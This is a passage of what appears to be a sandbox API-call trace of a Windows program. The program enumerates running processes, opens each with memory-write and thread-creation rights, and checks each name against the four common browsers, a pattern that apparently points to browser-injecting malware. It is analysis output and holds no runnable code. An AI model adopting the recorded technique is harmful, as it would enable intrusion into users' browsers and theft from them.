	[0231.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6a48
	[0231.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.338] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0231.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.338] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.339] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0231.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.339] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.340] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0231.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6a4c
	[0231.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.341] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0231.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.342] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.342] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0231.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.343] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.343] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0231.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6a50
	[0231.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.345] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0231.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.345] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.345] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0231.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.346] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.346] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0231.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6a54
	[0231.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.347] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.348] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.348] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.349] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.349] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6a58
	[0231.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.350] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.351] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.351] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.352] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6a5c
	[0231.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.354] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.355] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6a60
	[0231.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.357] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.358] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.358] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.358] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6a64
	[0231.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.360] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.360] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.361] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.361] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6a68
	[0231.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.363] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.365] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.365] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6a6c
	[0231.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.366] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.367] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.367] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.368] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6a70
	[0231.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.369] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.370] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.370] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.371] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0231.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6a74
	[0231.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.372] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0231.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.373] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.373] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0231.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.374] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6a78
	[0231.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.375] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.376] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.377] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.377] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.377] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0231.378] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6a7c
	[0231.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.379] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.379] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.380] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.381] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6a80
	[0231.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.383] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.383] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.384] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6a84
	[0231.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.385] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.386] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.386] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.387] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6a88
	[0231.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.388] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.389] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.390] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.391] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.392] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0231.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6a8c
	[0231.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.394] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0231.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.395] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.397] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0231.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.398] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0231.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6a90
	[0231.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.401] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.402] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.402] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.403] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0231.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6a94
	[0231.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.405] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0231.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.406] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.406] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0231.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.406] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0231.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0231.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0231.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6a98
	[0231.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.408] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0231.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.409] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.409] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0231.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.410] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.410] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0231.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6a9c
	[0231.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.418] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0231.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.418] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.418] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0231.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.419] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.419] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0231.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6aa0
	[0231.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0231.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0231.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.421] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.421] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0231.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6aa4
	[0231.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0231.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0231.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.423] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0231.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6aa8
	[0231.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0231.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
